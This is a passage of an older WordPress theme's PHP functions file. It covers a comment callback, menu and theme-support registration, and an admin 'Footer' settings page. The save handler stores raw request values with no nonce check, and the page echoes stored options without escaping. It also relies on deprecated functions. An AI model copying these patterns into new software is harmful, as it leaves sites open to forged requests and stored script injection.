		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
